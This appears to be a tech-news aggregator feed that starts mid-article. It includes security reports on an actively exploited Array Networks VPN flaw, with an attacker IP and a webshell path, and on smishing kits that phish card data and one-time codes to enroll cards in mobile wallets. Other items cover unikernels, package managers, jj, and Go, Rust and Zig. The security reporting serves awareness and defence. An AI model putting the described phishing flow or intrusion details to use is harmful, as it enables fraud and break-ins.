An advisory from Japan's Computer Emergency and Response Team (CERT) warns that hackers have been exploiting the vulnerability since at least August in attacks targeting organizations in the country.

The agency reports that the attacks originate from the IP address 194.233.100[.]138, which is also used for communications.

“In the incidents confirmed by JPCERT/CC, a command was executed attempting to place a PHP webshell file in the path /ca/aproxy/webapp/,” reads the bulletin (machine translated).

The flaw impacts ArrayOS AG 9.4.5.8 and earlier versions, including AG Series hardware and virtual appliances with the ‘DesktopDirect’ remote access feature enabled.

JPCERT says that Array OS version 9.4.5.9 addresses the problem and provides the following workarounds if updating is not possible:

  1. If the DesktopDirect feature is not in use, disable all DesktopDirect services
  2. Use URL filtering to block access to URLs containing a semicolon

Array Networks AG Series is a line of secure access gateways that rely on SSL VPNs to create encrypted tunnels for secure remote access to corporate networks, applications, desktops, and cloud resources.

Typically, they are used by large organizations and enterprises that need to facilitate remote or mobile work.

Macnica’s security researcher, Yutaka Sejiyama , reported on X that his scans returned 1,831 ArrayAG instances worldwide, primarily in China, Japan, and the United States.

The researcher verified that at least 11 hosts have the DesktopDirect feature enabled, but cautioned that the possibility of more hosts with DesktopDirect active is significant.

Tweet

“Because this product’s user base is concentrated in Asia and most of the observed attacks are in Japan, security vendors and security organizations outside Japan have not been paying close attention,” Sejiyama told BleepingComputer.

BleepingComputer contacted Array Networks to ask whether they plan to publish a CVE-ID and an official advisory for the actively exploited flaw, but a reply was not available by publication time.

Last year, CISA warned about active exploitation targeting CVE-2023-28461 , a critical remote code execution in Array Networks AG and vxAG ArrayOS.

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

SMS Phishers Pivot to Points, Taxes, Fake Retailers

Krebs
krebsonsecurity.com
2025-12-04 23:02:34
China-based phishing groups blamed for non-stop scam SMS messages about a supposed wayward package or unpaid toll fee are promoting a new offering, just in time for the holiday shopping season: Phishing kits for mass-creating fake but convincing e-commerce websites that convert customer payment card...
Original Article

China-based phishing groups blamed for non-stop scam SMS messages about a supposed wayward package or unpaid toll fee are promoting a new offering, just in time for the holiday shopping season: Phishing kits for mass-creating fake but convincing e-commerce websites that convert customer payment card data into mobile wallets from Apple and Google. Experts say these same phishing groups also are now using SMS lures that promise unclaimed tax refunds and mobile rewards points.

Over the past week, thousands of domain names were registered for scam websites that purport to offer T-Mobile customers the opportunity to claim a large number of rewards points. The phishing domains are being promoted by scam messages sent via Apple’s iMessage service or the functionally equivalent RCS messaging service built into Google phones.

An instant message spoofing T-Mobile says the recipient is eligible to claim thousands of rewards points.

The website scanning service urlscan.io shows thousands of these phishing domains have been deployed in just the past few days alone. The phishing websites will only load if the recipient visits with a mobile device, and they ask for the visitor’s name, address, phone number and payment card data to claim the points.

A phishing website registered this week that spoofs T-Mobile.

If card data is submitted, the site will then prompt the user to share a one-time code sent via SMS by their financial institution. In reality, the bank is sending the code because the fraudsters have just attempted to enroll the victim’s phished card details in a mobile wallet from Apple or Google. If the victim also provides that one-time code, the phishers can then link the victim’s card to a mobile device that they physically control .

Pivoting off these T-Mobile phishing domains in urlscan.io reveals a similar scam targeting AT&T customers:

An SMS phishing or “smishing” website targeting AT&T users.

Ford Merrill works in security research at SecAlliance , a CSIS Security Group company. Merrill said multiple China-based cybercriminal groups that sell phishing-as-a-service platforms have been using the mobile points lure for some time, but the scam has only recently been pointed at consumers in the United States.

“These points redemption schemes have not been very popular in the U.S., but have been in other geographies like EU and Asia for a while now,” Merrill said.

A review of other domains flagged by urlscan.io as tied to this Chinese SMS phishing syndicate shows they are also spoofing U.S. state tax authorities, telling recipients they have an unclaimed tax refund. Again, the goal is to phish the user’s payment card information and one-time code.

A text message that spoofs the District of Columbia’s Office of Tax and Revenue.

CAVEAT EMPTOR

Many SMS phishing or “smishing” domains are quickly flagged by browser makers as malicious. But Merrill said one burgeoning area of growth for these phishing kits — fake e-commerce shops — can be far harder to spot because they do not call attention to themselves by spamming the entire world.

Merrill said the same Chinese phishing kits used to blast out package redelivery message scams are equipped with modules that make it simple to quickly deploy a fleet of fake but convincing e-commerce storefronts. Those phony stores are typically advertised on Google and Facebook , and consumers usually end up at them by searching online for deals on specific products.

A machine-translated screenshot of an ad from a China-based phishing group promoting their fake e-commerce shop templates.

With these fake e-commerce stores, the customer is supplying their payment card and personal information as part of the normal check-out process, which is then punctuated by a request for a one-time code sent by your financial institution. The fake shopping site claims the code is required by the user’s bank to verify the transaction, but it is sent to the user because the scammers immediately attempt to enroll the supplied card data in a mobile wallet.

According to Merrill, it is only during the check-out process that these fake shops will fetch the malicious code that gives them away as fraudulent, which tends to make it difficult to locate these stores simply by mass-scanning the web. Also, most customers who pay for products through these sites don’t realize they’ve been snookered until weeks later when the purchased item fails to arrive.

“The fake e-commerce sites are tough because a lot of them can fly under the radar,” Merrill said. “They can go months without being shut down, they’re hard to discover, and they generally don’t get flagged by safe browsing tools.”

Happily, reporting these SMS phishing lures and websites is one of the fastest ways to get them properly identified and shut down. Raymond Dijkxhoorn is the CEO and a founding member of SURBL , a widely-used blocklist that flags domains and IP addresses known to be used in unsolicited messages, phishing and malware distribution. SURBL has created a website called smishreport.com that asks users to forward a screenshot of any smishing message(s) received.

“If [a domain is] unlisted, we can find and add the new pattern and kill the rest” of the matching domains, Dijkxhoorn said. “Just make a screenshot and upload. The tool does the rest.”

The SMS phishing reporting site smishreport.com.

Merrill said the last few weeks of the calendar year typically see a big uptick in smishing — particularly package redelivery schemes that spoof the U.S. Postal Service or commercial shipping companies.

“Every holiday season there is an explosion in smishing activity,” he said. “Everyone is in a bigger hurry, frantically shopping online, paying less attention than they should, and they’re just in a better mindset to get phished.”

SHOP ONLINE LIKE A SECURITY PRO

As we can see, adopting a shopping strategy of simply buying from the online merchant with the lowest advertised prices can be a bit like playing Russian Roulette with your wallet. Even people who shop mainly at big-name online stores can get scammed if they’re not wary of too-good-to-be-true offers (think third-party sellers on these platforms).

If you don’t know much about the online merchant that has the item you wish to buy, take a few minutes to investigate its reputation. If you’re buying from an online store that is brand new, the risk that you will get scammed increases significantly. How do you know the lifespan of a site selling that must-have gadget at the lowest price? One easy way to get a quick idea is to run a basic WHOIS search on the site’s domain name. The more recent the site’s “created” date, the more likely it is a phantom store.

If you receive a message warning about a problem with an order or shipment, visit the e-commerce or shipping site directly, and avoid clicking on links or attachments — particularly missives that warn of some dire consequences unless you act quickly. Phishers and malware purveyors typically seize upon some kind of emergency to create a false alarm that often causes recipients to temporarily let their guard down.

But it’s not just outright scammers who can trip up your holiday shopping: Often times, items that are advertised at steeper discounts than other online stores make up for it by charging way more than normal for shipping and handling.

So be careful what you agree to: Check to make sure you know how long the item will take to be shipped, and that you understand the store’s return policies. Also, keep an eye out for hidden surcharges, and be wary of blithely clicking “ok” during the checkout process.

Most importantly, keep a close eye on your monthly statements. If I were a fraudster, I’d most definitely wait until the holidays to cram through a bunch of unauthorized charges on stolen cards, so that the bogus purchases would get buried amid a flurry of other legitimate transactions. That’s why it’s key to closely review your credit card bill and to quickly dispute any charges you didn’t authorize.

StardustOS: Library operating system for building light-weight Unikernels

Hacker News
github.com
2025-12-04 22:56:08
Comments...
Original Article

alt text

What is Stardust?

Stardust is a unikernel operating system designed to run Cloud applications in a protected, single-address space environment. It delegates the management of physical resources to an underlying hypervisor which is treated as a trusted platform. Stardust has a small code base that can be maintained easily, and relies on static linking to combine a minimal kernel with a single application, along with the libraries and associated programming language run-time required for the execution of the application. Due to static linking, an executable binary of Stardust is packaged within an immutable single-purpose virtual machine image. Stardust supports multiple cores, preemptive threads, and basic block and networking drivers, and provides a collection of standard POSIX-compatible libraries.

Stardust is being used in supporting the teaching and research activities at the University of St Andrews.

Projects

  • Stardust provides the unikernel implementation in C.
  • Stardust-oxide is a re-implementation of the unikernel in Rust.
  • Duster provides a small debugger for para-virtualised Unikernels written in C that run on the Xen hypervisor.

Talks

Material

  • Jaradat, W., Dearle, A. and Lewis, J. Unikernel support for the deployment of light-weight, self-contained, and latency avoiding services. In the Third Annual UK System Research Challenges Workshop, United Kingdom, 2018.
  • McKeogh, F., Stardust Oxide , Dissertation, University of St Andrews, United Kingdom.

Pinned Loading

  1. Rust-based Unikernel

    Rust 125 1

  2. Small debugger for C-based PV Unikernels that run on Xen

    Go 2 1

  3. Software libraries ported to Stardust for experimentation

    C

  4. A minimal kernel used as a reference implementation to support teaching activities.

    C 6 2

Repositories

Showing 9 of 9 repositories

  • StardustOS/stardust_db’s past year of commit activity

    Rust 0 0

    0 0

    Updated Apr 13, 2025

  • StardustOS/stardust’s past year of commit activity

    C

    19

    GPL-2.0

    4 0 0

    Updated Apr 13, 2025

  • StardustOS/.github’s past year of commit activity

    0 0

    0 0

    Updated Jan 7, 2025

  • StardustOS/stardust-oxide’s past year of commit activity

    Rust

    125

    MPL-2.0

    1 2 1

    Updated Jan 22, 2024

  • minimal Public

    A minimal kernel used as a reference implementation to support teaching activities.

    StardustOS/minimal’s past year of commit activity

    C

    6 2 0 0

    Updated Feb 23, 2022

  • rust Public Forked from rust-lang/rust

    Empowering everyone to build reliable and efficient software.

    StardustOS/rust’s past year of commit activity

  • packages Public

    Software libraries ported to Stardust for experimentation

    StardustOS/packages’s past year of commit activity

    C 0 0

    0 0

    Updated Dec 29, 2020

  • duster Public

    Small debugger for C-based PV Unikernels that run on Xen

    StardustOS/duster’s past year of commit activity

    Go

    2 1 0 0

    Updated Nov 25, 2020

  • StardustOS/xen’s past year of commit activity

    C 0

    371 0 0

    Updated Mar 16, 2020

State of AI: An Empirical 100T Token Study with OpenRouter

Hacker News
openrouter.ai
2025-12-04 22:26:43
Comments...

NCSC's ‘Proactive Notifications’ warns orgs of flaws in exposed devices

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 22:21:12
The UK's National Cyber Security Center (NCSC) announced the testing phase of a new service called Proactive Notifications, designed to inform organizations in the country of vulnerabilities present in their environment. [...]...
Original Article

NCSC's ‘Proactive Notifications’ warns orgs of flaws in exposed devices

The UK's National Cyber Security Center (NCSC) announced the testing phase of a new service called Proactive Notifications, designed to inform organizations in the country of vulnerabilities present in their environment.

The service is delivered through cybersecurity firm Netcraft and is based on publicly available information and internet scanning.

The NSCS will identify organizations that lack essential security services and will contact them with specific software update recommendations that address unpatched vulnerabilities.

This may include recommendations on specific CVEs or general security issues, such as the use of weak encryption.

“Scanning and notifications will be based on external observations such as the version number publicly advertised by the software,” NCSC explains , adding that this activity is “in compliance with the Computer Misuse Act.”

The agency highlights that the emails sent through this service originate from netcraft.com addresses, do not include attachments, and do not request payments, personal, or other type of information.

BleepingComputer learned that the pilot program will cover UK domains and IP addresses from Autonomous System Numbers (ASNs) in the country.

The service will not cover all systems or vulnerabilities, though, and the recommendation is that entities do not rely on it alone for security alerts.

Organizations are strongly encouraged to sign up for the more mature ‘Early Warning’ service to receive timely notifications for security issues affecting their networks.

Early Warning is a free service from NCSC that alerts on potential cyberattacks, vulnerabilities, or other suspicious activity in a company's network.

It works by aggregating public, private, and government cyber-threat intelligence feeds and cross-referencing them with the domains and IP addresses of enrolled organizations to spot signs of active compromises.

Proactive Notification is triggered before a direct threat or compromise is detected, when NCSC becomes aware of a risk relevant to an organization’s setup.

Together, the two services will form a layered security approach.  Proactive Notification helps with hardening systems and reducing risks, while Early Warning will pick up what still manages to slip through.

The NCSC has not provided a timeline for the Proactive Notifications program exiting the pilot phase and becoming more broadly available.

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

What is a Package Manager?

Lobsters
nesbitt.io
2025-12-04 22:20:47
Comments...
Original Article

When people think of package managers they usually picture installing a library but these days package managers and their associated registries handle dozens of distinct functions.

A package manager is a tool that automates the process of installing, updating, configuring, and removing software packages. In practice, modern language package managers have accumulated responsibilities far beyond this definition.

The client

An installer: downloads a package archive from the registry, extracts it and places it in your language’s load path so your code can import it.

An updater: checks for newer versions of installed packages, downloads them, and replaces the old versions, either one at a time or everything at once.

A dependency resolver: when you install a package, you install its dependencies, and their dependencies, and so on, and the resolver figures out which versions can coexist, which is NP-complete and therefore slow, difficult, and full of trade-offs.

A local cache: stores downloaded packages on disk so subsequent installs don’t hit the network, enabling offline installs and faster builds while raising questions about cache invalidation when packages change.

A command runner: executes a package’s CLI tool without permanently installing it by downloading the package, running the command, and cleaning up, which is useful for one-off tasks or trying tools without committing to them.

A script executor: runs scripts defined in your manifest file, whether build, test, lint, deploy, or any custom command, providing a standard way to invoke project tasks without knowing the underlying tools.

Project definition

A manifest format: a file that declares your project’s dependencies with version constraints, plus metadata like name, version, description, author, license, repository URL, keywords, and entry points, serving as the source of truth for what your project needs.

A lockfile format: records the exact versions of every direct and transitive dependency that were resolved, often with checksums to verify integrity, ensuring everyone working on the project gets identical dependencies.

Dependency types: distinguishes between runtime dependencies, development dependencies, peer dependencies, and optional dependencies, each with different semantics for when they get installed and who’s responsible for providing them.

Overrides and resolutions: lets you force specific versions of transitive dependencies when the default resolution doesn’t work, useful for patching security issues or working around bugs before upstream fixes them.

Workspaces: manages multiple packages in a single repository, sharing dependencies and tooling across a monorepo while still publishing each package independently.

The registry

An index: lists all published versions of a package with release dates and metadata, letting you pick a specific version or see what’s available, and is the baseline data most tooling relies on.

A publishing platform: packages your code into an archive, uploads it to the registry, and makes it available for anyone to install, handling versioning, metadata validation, and release management.

A namespace: every package needs a unique name, and most registries use flat namespaces where names are globally unique and first-come-first-served, making short names scarce and valuable, though some support scoped names for organizations or use reverse domain notation to avoid conflicts.

A search engine: the registry website lets you find packages by name, keyword, or category, with results sorted by downloads, recent activity, or relevance, and is often the first place developers go when looking for a library.

A documentation host: renders READMEs on package pages, displays changelogs, and sometimes generates API documentation from source code, with some registries hosting full documentation sites separate from the package listing.

A download counter: tracks how often each package and version gets downloaded, helping developers gauge popularity, identify abandoned projects, and make decisions about which libraries to trust.

A dependency graph API: exposes the full tree of what depends on what, both for individual packages and across the entire registry, which security tools use to trace vulnerability impact and researchers use to study ecosystem structure.

A CDN: distributes package downloads across edge servers worldwide, and since a popular registry handles billions of requests per week, caching, geographic distribution, and redundancy matter because outages affect millions of builds.

A binary host: stores and serves precompiled binaries for packages that include native code, with different binaries for different operating systems, architectures, and language versions, saving users from compiling C extensions themselves.

A build farm: some registries compile packages from source on their own infrastructure, producing binaries that users can trust weren’t tampered with on a developer’s laptop and ensuring consistent build environments.

A mirror: organizations run internal copies of registries for reliability, speed, or compliance, since some companies need packages to come from their own infrastructure, and registries provide protocols and tooling to make this work.

A deprecation policy: rules for marking packages as deprecated, transferring ownership of abandoned packages, or removing code entirely, addressing what happens when a maintainer disappears or a package becomes harmful and balancing immutability against the need to fix mistakes.

Security

An authentication system: publishers need accounts to upload packages, so registries handle signup, login, password reset, two-factor authentication, and API tokens with scopes and expiration, since account security directly affects supply chain security.

An access control system: registries determine who can publish or modify which packages through maintainer lists, organization teams, and role-based permissions, with some supporting granular controls like publish-only tokens or requiring multiple maintainers to sign off on releases.

Trusted publishing: some registries allow CI systems to publish packages using short-lived OIDC tokens instead of long-lived secrets, so you don’t have to store credentials in your build environment and compromised tokens expire quickly.

An audit log: registries record who published what package, when, from what IP address, and using what credentials, useful for forensics after a compromise or just understanding how a package evolved.

Integrity verification: registries provide checksums that detect corrupted or tampered downloads independent of signatures, so even without cryptographic verification you know you got what the registry sent.

A signing system: registries support cryptographic signatures that verify who published a package and that it hasn’t been tampered with. Build provenance attestations can prove a package was built from specific source code in a specific environment.

A security advisory database: registries maintain a catalog of known vulnerabilities mapped to affected package versions, so when a CVE is published they track which packages and version ranges are affected and tools can warn users.

A vulnerability scanner: checks your installed dependencies against the advisory database and flags packages with known security issues, often running automatically during install or as a separate audit command.

A malware scanner: registries analyze uploaded packages for malicious code before or after they’re published, where automated static analysis catches obvious patterns but sophisticated attacks often require human review.

A typosquatting detector: registries scan for package names that look like misspellings of popular packages, which attackers register to catch developers who mistype an install command, and try to detect and block them before they cause harm.

An SBOM generator: produces software bills of materials listing every component in your dependency tree, used for compliance, auditing, and tracking what’s actually running in production.

A security team: registries employ people who triage vulnerability reports, investigate suspicious packages, coordinate takedowns, and respond to incidents, because automation helps but humans make the judgment calls.

So what is a package manager? It depends how far you zoom out. At the surface, it’s a command that installs libraries. One level down, it’s a dependency resolver and a reproducibility tool. Further still, it’s a publishing platform, a search engine, a security operation, and part of global infrastructure.

And how does all of this get funded and supported on an ongoing basis? Sponsorship programs, foundation grants, corporate backing, or just volunteer labor - it varies widely and often determines what’s possible.

jujutsu v0.36.0 released

Lobsters
github.com
2025-12-04 21:46:54
Comments...
Original Article

About

jj is a Git-compatible version control system that is both simple and powerful. See
the installation instructions to get started.

Release highlights

  • The documentation has moved from https://jj-vcs.github.io/jj/ to
    https://docs.jj-vcs.dev/ .

    301 redirects are being issued towards the new domain, so any existing links
    should not be broken.

  • Fixed race condition that could cause divergent operations when running
    concurrent jj commands in colocated repositories. It is now safe to
    continuously run e.g. jj log without --ignore-working-copy in one
    terminal while you're running other commands in another terminal.
    #6830

  • jj now ignores $PAGER set in the environment and uses less -FRX on most
    platforms ( :builtin on Windows). See the docs for
    more information, and #3502 for
    motivation.

Breaking changes

  • In filesets or path patterns , glob matching
    is enabled by default. You can use cwd:"path" to match literal paths.

  • In the following commands, string pattern
    arguments
    are now parsed the same way they
    are in revsets and can be combined with logical operators: jj bookmark delete / forget / list / move , jj tag delete / list , jj git clone / fetch / push

  • In the following commands, unmatched bookmark/tag names is no longer an
    error. A warning will be printed instead: jj bookmark delete / forget / move / track / untrack , jj tag delete , jj git clone / push

  • The default string pattern syntax in revsets will be changed to glob: in a
    future release. You can opt in to the new default by setting
    ui.revsets-use-glob-by-default=true .

  • Upgraded scm-record from v0.8.0 to v0.9.0. See release notes at
    https://github.com/arxanas/scm-record/releases/tag/v0.9.0 .

  • The minimum supported Rust version (MSRV) is now 1.89.

  • On macOS, the deprecated config directory ~/Library/Application Support/jj
    is not read anymore. Use $XDG_CONFIG_HOME/jj instead (defaults to
    ~/.config/jj ).

  • Sub-repos are no longer tracked. Any directory containing .jj or .git
    is ignored. Note that Git submodules are unaffected by this.

Deprecations

  • The --destination / -d arguments for jj rebase , jj split , jj revert ,
    etc. were renamed to --onto / -o . The reasoning is that --onto ,
    --insert-before , and --insert-after are all destination arguments, so
    calling one of them --destination was confusing and unclear. The old names
    will be removed at some point in the future, but we realize that they are
    deep in muscle memory, so you can expect an unusually long deprecation period.

  • jj describe --edit is deprecated in favor of --editor .

  • The config options git.auto-local-bookmark and git.push-new-bookmarks are
    deprecated in favor of remotes.<name>.auto-track-bookmarks . For example:

    [remotes.origin]
    auto-track-bookmarks = "glob:*"

    For more details, refer to
    the docs .

  • The flag --allow-new on jj git push is deprecated. In order to push new
    bookmarks, please track them with jj bookmark track . Alternatively, consider
    setting up an auto-tracking configuration to avoid the chore of tracking
    bookmarks manually. For example:

    [remotes.origin]
    auto-track-bookmarks = "glob:*"

    For more details, refer to
    the docs .

New features

  • jj commit , jj describe , jj squash , and jj split now accept
    --editor , which ensures an editor will be opened with the commit
    description even if one was provided via --message / -m .

  • All jj commands show a warning when the provided fileset expression
    doesn't match any files.

  • Added files() template function to DiffStats . This supports per-file stats
    like lines_added() and lines_removed()

  • Added join() template function. This is different from separate() in that
    it adds a separator between all arguments, even if empty.

  • RepoPath template type now has a absolute() -> String method that returns
    the absolute path as a string.

  • Added format_path(path) template that controls how file paths are printed
    with jj file list .

  • New built-in revset aliases visible() and hidden() .

  • Unquoted * is now allowed in revsets. bookmarks(glob:foo*) no longer
    needs quoting.

  • jj prev/next --no-edit now generates an error if the working-copy has some
    children.

  • A new config option remotes.<name>.auto-track-bookmarks can be set to a
    string pattern. New bookmarks matching it will be automatically tracked for
    the specified remote. See
    the docs .

  • jj log now supports a --count flag to print the number of commits instead
    of displaying them.

Fixed bugs

  • jj fix now prints a warning if a tool failed to run on a file.
    #7971

  • Shell completion now works with non‑normalized paths, fixing the previous
    panic and allowing prefixes containing . or .. to be completed correctly.
    #6861

  • Shell completion now always uses forward slashes to complete paths, even on
    Windows. This renders completion results viable when using jj in Git Bash.
    #7024

  • Unexpected keyword arguments now return a parse failure for the coalesce()
    and concat() templating functions.

  • Nushell completion script documentation add -f option, to keep it up to
    date.
    #8007

  • Ensured that with Git submodules, remnants of your submodules do not show up
    in the working copy after running jj new .
    #4349

Contributors

Thanks to the people who made this release happen!

Thoughts on Go vs. Rust vs. Zig

Hacker News
sinclairtarget.com
2025-12-04 21:40:24
Comments...
Original Article

Aug 09, 2025

I realized recently that rather than using “the right tool for the job” I’ve been using the tool at the job and that’s mostly determined the programming languages I know. So over the last couple months I’ve put a lot of time into experimenting with languages I don’t get to use at work. My goal hasn’t been proficiency; I’m more interested in forming an opinion on what each language is good for.

Programming languages differ along so many axes that it can be hard to compare them without defaulting to the obviously true but 1) entirely boring and 2) not-that-helpful conclusion that there are trade-offs. Of course there are trade-offs. The important question is, why did this language commit to this particular set of trade-offs?

That question is interesting to me because I don’t want to choose a language based on a list of features as if I were buying a humidifier. I care about building software and I care about my tools. In making the trade-offs they make, languages express a set of values. I’d like to find out which values resonate with me.

That question is also useful in clarifying the difference between languages that, at the end of the day, have feature sets that significantly overlap. If the number of questions online about “Go vs. Rust” or “Rust vs. Zig” is a reliable metric, people are confused. It’s hard to remember, say, that language X is better for writing web services because it has features a , b , and c whereas language Y only has features a and b . Easier, I think, to remember that language X is better for writing web services because language Y was designed by someone who hates the internet (let’s imagine) and believes we should unplug the whole thing.

I’ve collected here my impressions of the three languages I’ve experimented with lately: Go, Rust, and Zig. I’ve tried to synthesize my experience with each language into a sweeping verdict on what that language values and how well it executes on those values. This might be reductive, but, like, crystallizing a set of reductive prejudices is sort of what I’m trying to do here.

Go

Go is distinguished by its minimalism. It has been described as “a modern C.” Go isn’t like C, because it is garbage-collected and has a real run-time, but it is like C in that you can fit the whole language in your head.

You can fit the whole language in your head because Go has so few features. For a long time, Go was notorious for not having generics. That was finally changed in Go 1.18, but that was only after 12 years of people begging for generics to be added to the language. Other features common in modern languages, like tagged unions or syntactic sugar for error-handling, have not been added to Go.

It seems the Go development team has a high bar for adding features to the language. The end result is a language that forces you to write a lot of boilerplate code to implement logic that could be more succinctly expressed in another language. But the result is also a language that is stable over time and easy to read.

To give you another example of Go’s minimalism, consider Go’s slice type. Both Rust and Zig have a slice type, but these are fat pointers and fat pointers only. In Go, a slice is a fat pointer to a contiguous sequence in memory, but a slice can also grow, meaning that it subsumes the functionality of Rust’s Vec<T> type and Zig’s ArrayList . Also, since Go is managing your memory for you, Go will decide whether your slice’s backing memory lives on the stack or the heap; in Rust or Zig, you have to think much harder about where your memory lives.

Go’s origin myth, as I understand it, is basically this: Rob Pike was sick of waiting for C++ projects to compile and was sick of other programmers at Google making mistakes in those same C++ projects. Go is therefore simple where C++ is baroque. It is a language for the programming rank and file, designed to be sufficient for 90% of use cases while also being easy to understand, even (perhaps especially) when writing concurrent code.

I don’t use Go at work, but I think I should. Go is minimal in service of corporate collaboration. I don’t mean that as a slight—building software in a corporate environment has its own challenges, which Go solves for.

Rust

Where Go is minimalist, Rust is maximalist. A tagline often associated with Rust is “zero-cost abstractions.” I would amend that to read, “zero-cost abstractions, and lots of them!”

Rust has a reputation for being hard to learn. I agree with Jamie Brandon, who writes that it’s not lifetimes that make Rust difficult , it’s the number of concepts stuffed into the language. I’m not the first person to pick on this particular Github comment , but it perfectly illustrates the conceptual density of Rust:

The type Pin<&LocalType> implements Deref<Target = LocalType> but it doesn’t implement DerefMut . The types Pin and & are #[fundamental] so that an impl DerefMut for Pin<&LocalType>> is possible. You can use LocalType == SomeLocalStruct or LocalType == dyn LocalTrait and you can coerce Pin<Pin<&SomeLocalStruct>> into Pin<Pin<&dyn LocalTrait>> . (Indeed, two layers of Pin!!) This allows creating a pair of “smart pointers that implement CoerceUnsized but have strange behavior” on stable ( Pin<&SomeLocalStruct> and Pin<&dyn LocalTrait> become the smart pointers with “strange behavior” and they already implement CoerceUnsized ).

Of course, Rust isn’t trying to be maximalist the same way Go is trying to be minimalist. Rust is a complex language because what it’s trying to do is deliver on two goals—safety and performance—that are somewhat in tension.

The performance goal is self-explanatory. What “safety” means is less clear; at least it was to me, though maybe I’ve just been Python-brained for too long. “Safety” means “memory safety,” the idea that you shouldn’t be able to dereference an invalid pointer, or do a double-free, etc. But it also means more than that. A “safe” program avoids all undefined behavior (sometimes referred to as “UB”).

What is the dreaded UB? I think the best way to understand it is to remember that, for any running program, there are FATES WORSE THAN DEATH. If something goes wrong in your program, immediate termination is great actually! Because the alternative, if the error isn’t caught, is that your program crosses over into a twilight zone of unpredictability, where its behavior might be determined by which thread wins the next data race or by what garbage happens to be at a particular memory address. Now you have heisenbugs and security vulnerabilities. Very bad.

Rust tries to prevent UB without paying any run-time performance penalty by checking for it at compile-time. The Rust compiler is smart, but it’s not omniscient. For it to be able to check your code, it has to understand what your code will do at run-time. And so Rust has an expressive type system and a menagerie of traits that allow you to express, to the compiler, what in another language would just be the apparent run-time behavior of your code.

This makes Rust hard, because you can’t just do the thing! You have to find out Rust’s name for the thing—find the trait or whatever you need—then implement it as Rust expects you to. But if you do this, Rust can make guarantees about the behavior of your code that other languages cannot, which depending on your application might be crucial. It can also make guarantees about other people’s code, which makes consuming libraries easy in Rust and explains why Rust projects have almost as many dependencies as projects in the JavaScript ecosystem.

Zig

Of the three languages, Zig is the newest and least mature. As of this writing, Zig is only on version 0.14. Its standard library has almost zero documentation and the best way to learn how to use it is to consult the source code directly.

Although I don’t know if this is true, I like to think of Zig as a reaction to both Go and Rust. Go is simple because it obscures details about how the computer actually works. Rust is safe because it forces you to jump through its many hoops. Zig will set you free! In Zig, you control the universe and nobody can tell you what to do.

In both Go and Rust, allocating an object on the heap is as easy as returning a pointer to a struct from a function. The allocation is implicit. In Zig, you allocate every byte yourself, explicitly. (Zig has manual memory management.) You have more control here than you have even in C: To allocate bytes, you have to call alloc() on a specific kind of allocator, meaning you have to decide on the best allocator implementation for your use case.

In Rust, creating a mutable global variable is so hard that there are long forum discussions on how to do it. In Zig, you can just create one, no problem.

Undefined behavior is still important in Zig. Zig calls it “illegal behavior.” It tries to detect it at run-time and crash the program when it occurs. For those who might worry about the performance cost of these checks, Zig offers four different “release modes” that you can choose from when you build your program. In some of these, the checks are disabled. The idea seems to be that you can run your program enough times in the checked release modes to have reasonable confidence that there will be no illegal behavior in the unchecked build of your program. That seems like a highly pragmatic design to me.

Another difference between Zig and the other two languages is Zig’s relationship to object-oriented programming. OOP has been out of favor for a while now and both Go and Rust eschew class inheritance. But Go and Rust have enough support for other object-oriented programming idioms that you could still construct your program as a graph of interacting objects if you wanted to. Zig has methods, but no private struct fields and no language feature implementing run-time polymorphism (AKA dynamic dispatch), even though std.mem.Allocator is dying to be an interface. As best as I can tell, these exclusions are intentional; Zig is a language for data-oriented design .

One more thing I want to say about this, because I found it eye-opening: It might seem crazy to be building a programming language with manual memory management in 2025, especially when Rust has shown that you don’t even need garbage collection and can let the compiler do it for you. But this is a design choice very much related to the choice to exclude OOP features. In Go and Rust and so many other languages, you tend to allocate little bits of memory at a time for each object in your object graph. Your program has thousands of little hidden malloc() s and free() s, and therefore thousands of different lifetimes. This is RAII . In Zig, it might seem like manual memory management would require lots of tedious, error-prone bookkeeping, but that’s only if you insist on tying memory allocations to all your little objects. You could instead just allocate and free big chunks of memory at certain sensible points in your program (like at the start of each iteration of your event loop), and use that memory to hold the data you need to operate on. It’s this approach that Zig encourages.

Many people seem confused about why Zig should exist if Rust does already. It’s not just that Zig is trying to be simpler. I think this difference is the more important one. Zig wants you to excise even more object-oriented thinking from your code.

Zig has a fun, subversive feel to it. It’s a language for smashing the corporate class hierarchy (of objects). It’s a language for megalomaniacs and anarchists. I like it. I hope it gets to a stable release soon, though the Zig team’s current priority seems to be rewriting all of their dependencies . It’s not impossible they try to rewrite the Linux kernel before we see Zig 1.0.

AG Tish James Won’t Prosecute the Cops Who Killed Win Rozario

hellgate
hellgatenyc.com
2025-12-04 21:30:12
Shooting Rozario less than two minutes after entering his appartment wasn’t provably unjustified, a report by the Attorney General’s office concluded....
Original Article
AG Tish James Won’t Prosecute the Cops Who Killed Win Rozario
A still from the body-worn camera of Officer Matthew Cianfrocco the day he shot Win Rozario. (New York Attorney General’s Office)

The Cops

Scott's Picks:

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Hell Gate.

Your link has expired.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.

8086 Microcode Explorer

Lobsters
nand2mario.github.io
2025-12-04 21:23:56
Comments...
Original Article

Browse all 512 micro-instructions. Hover the Binary, Move, and Action columns for decoded details and color-coded bit fields.

Source: Andrew Jenner’s 8086 microcode disassembly, based on Ken Shirriff's die photo.

Author: @nand2mario — December 2025

The Intel 8086 executes its machine instructions through microcode. This viewer presents an interactive listing of all 512 micro-instructions in the control ROM. Each micro-instruction is 21 bits wide, addressed by a 13-bit micro-address, and split into two parts: a Move field, which moves data between internal registers, and an Action field, which controls ALU operations, memory cycles, branching, and other control signals.

